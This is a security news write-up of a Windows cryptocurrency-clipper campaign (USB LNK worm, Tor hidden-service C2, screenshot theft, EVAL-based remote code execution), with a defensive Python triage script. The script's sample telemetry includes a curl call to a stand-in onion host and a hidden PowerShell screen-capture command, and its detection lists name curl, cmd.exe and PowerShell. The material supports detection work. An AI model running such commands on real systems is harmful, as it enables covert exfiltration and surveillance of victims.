Crypto Clipper Windows Attack Campaign

By Mezo in Malware, Stealers

Security researchers have revealed details of a sophisticated Windows-based cryptocurrency clipper operation that has been active since February 2026. The campaign employs clipboard-monitoring malware capable of self-propagation and leverages the Tor anonymity network to conceal its communications infrastructure.

Unlike conventional malware operations that rely on standard installers or publicly exposed Command-and-Control (C2) servers, this threat deploys a portable Tor client and routes all traffic through a local SOCKS5 proxy. By combining cryptocurrency theft, data exfiltration, and remote code execution capabilities, the malware functions not only as a clipper but also as a lightweight backdoor.

How the Clipper Malware Operates

Clipper malware is designed to silently monitor a victim's clipboard activity and intercept sensitive information copied into memory. Its primary objective is to manipulate cryptocurrency transactions by identifying wallet addresses associated with known blockchain formats and replacing them with attacker-controlled alternatives. As a result, funds intended for legitimate recipients can be redirected without the victim's knowledge.

This campaign relies on Windows Script Host and ActiveX-based functionality to launch an embedded Tor proxy and communicate with a hidden-service C2 server. The malware performs continuous clipboard surveillance, captures screenshots, steals cryptocurrency-related information, and substitutes wallet addresses in real time.

USB-Based Infection Chain and Worm Functionality

The attack begins with the distribution of malicious Windows Shortcut (LNK) files through removable USB storage devices. When a victim opens one of these shortcuts, a worm component is activated. The malware first determines whether the system has already been infected and downloads the remaining payload only if no prior infection is detected.

The LNK payload actively searches connected USB devices for commonly used document formats, including DOC, XLSX, and PDF files. Once discovered, these files are hidden and replaced with malicious shortcut files bearing identical names. This deceptive technique increases the likelihood that users will unknowingly execute the malware while attempting to open what appears to be a legitimate document.

Beyond the initial compromise, the worm is responsible for spreading the infection to additional uninfected USB devices. It also establishes persistence by creating scheduled tasks for both the worm and the stealer components.

Advanced Evasion and Persistent Command Execution

The clipper component utilizes WScript and ActiveXObject to interact directly with the operating system. To reduce the likelihood of detection, the malware checks active processes and terminates itself if Task Manager is running.

During the final stage of execution, a renamed Tor binary is launched in a hidden window. The malware then generates a unique victim identifier and registers it with its remote infrastructure. After registration, it enters a continuous operational loop, polling the C2 server for commands while monitoring clipboard contents approximately every 500 milliseconds.

In addition to harvesting cryptocurrency wallet data, seed phrases, and private keys, the malware captures screenshots and transfers them through the Tor network. If the C2 server responds with an EVAL command, attacker-supplied code is executed dynamically on the compromised system, significantly expanding the threat's capabilities.

Key Indicators and Defensive Recommendations

Security teams are advised to focus on behavioral detection techniques rather than relying solely on static malware signatures. Particular attention should be given to suspicious PowerShell-based screen-capture activity and unusual use of Windows scripting engines such as WScript or CScript to launch utilities including curl, cmd.exe, PowerShell, or other unexpected executables.

Recommended defensive measures include:

  • Disabling AutoRun and AutoPlay functionality for all removable media, blocking LNK file execution from USB devices through Group Policy Objects (GPOs), and limiting unnecessary use of wscript.exe and cscript.exe.
  • Monitoring systems that handle financial or cryptocurrency-related operations for abnormal clipboard activity, unauthorized screen-capture behavior, and suspicious Tor-related network communications.
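The behavioural patterns called out above (a Windows script host launching curl, cmd.exe or PowerShell; PowerShell command lines that touch screen-capture APIs; a script host talking to a local SOCKS listener) can be expressed as a small triage routine over process-creation and network-connection telemetry. The following is an added example written for this article, not code from the researchers or from the malware. It models Sysmon-style Event ID 1 (process create) and Event ID 3 (network connect) records; the event records are constructed, the allowlisted child `inventory_agent.exe` is a hypothetical site-specific tool, and the local ports 9050/9150 are Tor's default SOCKS listener ports, assumed here because the write-up does not state which port the campaign's portable Tor client uses.

```python
"""Behavioural triage for script-host abuse, PowerShell screen capture and
local Tor SOCKS use.  Added example with constructed telemetry; not the
article's or the campaign's code."""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Children a script host should almost never spawn on a workstation.
SUSPICIOUS_CHILDREN = {"curl.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
# Hypothetical site-specific allowlist; tune to the environment.
EXPECTED_CHILDREN = {"inventory_agent.exe"}
# .NET members a PowerShell screenshot routine has to reference.
SCREEN_CAPTURE_API = re.compile(
    r"CopyFromScreen|System\.Drawing\.Bitmap|Graphics\]::FromImage", re.I)
# Assumption: Tor's default SOCKS ports; the campaign's actual port is not given.
TOR_SOCKS_PORTS = {9050, 9150}
LOOPBACK = {"127.0.0.1", "::1"}


@dataclass
class Event:
    event_id: int          # 1 = process create, 3 = network connect
    image: str             # full path of the process
    parent_image: str = ""
    command_line: str = ""
    dest_ip: str = ""
    dest_port: int = 0


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(ev: Event) -> list[str]:
    """Return human-readable findings for one event (empty list = clean)."""
    findings: list[str] = []
    if ev.event_id == 1:
        parent, child = basename(ev.parent_image), basename(ev.image)
        if parent in SCRIPT_HOSTS:
            if child in SUSPICIOUS_CHILDREN:
                findings.append(f"{parent} launched {child}")
            elif child not in EXPECTED_CHILDREN:
                findings.append(f"{parent} launched unexpected executable {child}")
        if child in {"powershell.exe", "pwsh.exe"} and SCREEN_CAPTURE_API.search(ev.command_line):
            findings.append("PowerShell command line references a screen-capture API")
    elif ev.event_id == 3:
        if basename(ev.image) in SCRIPT_HOSTS and ev.dest_ip in LOOPBACK and ev.dest_port in TOR_SOCKS_PORTS:
            findings.append(f"{basename(ev.image)} connected to local SOCKS port {ev.dest_port}")
    return findings


# Constructed sample telemetry (not real campaign artefacts).
SAMPLE_EVENTS = [
    Event(1, r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\wscript.exe",
          "curl.exe --socks5-hostname 127.0.0.1:9050 http://EXAMPLE.onion/reg"),
    Event(1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\System32\wscript.exe",
          "powershell -w hidden -c $b=New-Object System.Drawing.Bitmap 1920,1080;"
          "$g=[System.Drawing.Graphics]::FromImage($b);$g.CopyFromScreen(0,0,0,0,$b.Size)"),
    Event(1, r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
    Event(1, r"C:\Tools\inventory_agent.exe", r"C:\Windows\System32\cscript.exe", "inventory_agent.exe"),
    Event(3, r"C:\Windows\System32\wscript.exe", dest_ip="127.0.0.1", dest_port=9050),
    Event(1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\explorer.exe", "powershell -c Get-ChildItem C:\\Users"),
]


def run(events: list[Event] = SAMPLE_EVENTS) -> dict[int, list[str]]:
    """Map event index -> findings, keeping only events that produced any."""
    return {i: f for i, ev in enumerate(events) if (f := triage(ev))}


if __name__ == "__main__":
    for idx, hits in run().items():
        for hit in hits:
            print(f"event {idx}: {hit}")
```

Running the block flags events 0, 1 and 4 and leaves the Explorer-launched Notepad and PowerShell and the allowlisted agent alone. In production the same logic would read real Sysmon or EDR records, and the allowlist and port set would come from a baseline of what script hosts actually spawn in that estate.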

Why This Threat Stands Out

This campaign demonstrates the increasing sophistication of financially motivated malware. By combining USB-based worm propagation, clipboard hijacking, Tor-obfuscated communications, screenshot exfiltration, and remote code execution into a single toolkit, the operators have created a versatile threat capable of both stealing cryptocurrency assets and maintaining long-term access to infected systems. The use of hidden-service infrastructure further complicates detection and takedown efforts, making proactive behavioral monitoring a critical defense strategy.